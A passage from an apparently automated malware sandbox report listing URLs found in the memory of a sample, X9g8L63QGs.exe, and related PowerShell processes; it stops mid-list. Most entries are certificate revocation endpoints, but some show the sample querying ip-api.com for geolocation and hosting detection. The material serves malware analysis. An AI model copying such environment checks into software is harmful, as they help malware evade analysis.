00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1696653047.000001E7C3008000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1687315240.000001E7C2FDD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1689257991.000001E7C3007000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1689148113.000001E7C2FF6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1514130016.0000024533D14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1579165727.000001752C62F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000014.00000002.1522920960.000002453402D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 00000014.00000002.1522920960.000002453402D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
              Source: X9g8L63QGs.exe, 00000004.00000002.1720049067.000001FB29ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: powershell.exe, 00000014.00000002.1514130016.0000024533D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: 
http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _ctypes.pyd.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: X9g8L63QGs.exe, 00000007.00000003.1288179226.000001E7C2913000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: X9g8L63QGs.exe, 00000007.00000003.1688465803.000001E7C28C2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694008349.000001E7C29A2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C28C6000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691953051.000001E7C29A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695698107.000001E7C2EAE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692076374.000001E7C2EBC000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692121496.000001E7C2EAD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695917994.000001E7C2EBD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691987395.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 00000014.00000002.1488439935.000002452B935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.0000017524565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.0000017515E59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://ocsp.digicert.com0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: 
http://ocsp.digicert.com0A
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: 
http://ocsp.digicert.com0C
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 